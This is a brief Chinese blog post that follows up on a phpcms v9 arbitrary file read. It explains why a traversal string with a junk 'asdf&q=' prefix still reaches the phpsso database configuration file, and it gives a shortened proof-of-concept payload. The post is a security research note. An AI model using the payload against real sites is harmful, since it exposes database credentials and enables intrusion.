phpcms v9的补充

前一篇留了个疑问:

为什么

file_get_contents(asdf&q=../../phpsso_server/caches/configs/database.php)可以读出文件呢,

 

他前面那个asdf&q=为什么没影响?

 

后来经过bacde大牛的指点:

 写道
前面的字符可以看成是一个文件夹名字

 忽然间反应了过来,那么路径实际上就变成了这个

 

asdf&q=../     这个是一个目录     

 ../                这句的目的在于返回asdf&q=../ 的上级目录,即根目录

phpsso_server/caches/configs/database.php 这里就是正常的路径了

 

那么我们可以建立一个名字叫asdf&q=的目录里面放一个1.txt然后路径变为这个

asdf&q=/1.txt,果然读了出来,而且asdf&q=......./1.txt这样子也读了出来

这又是一个小思索点。

 

 

不过之前的那个poc实际就可以改为

asdf&q=/../phpsso_server/caches/configs/database.php

少了两个..完全可以

  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值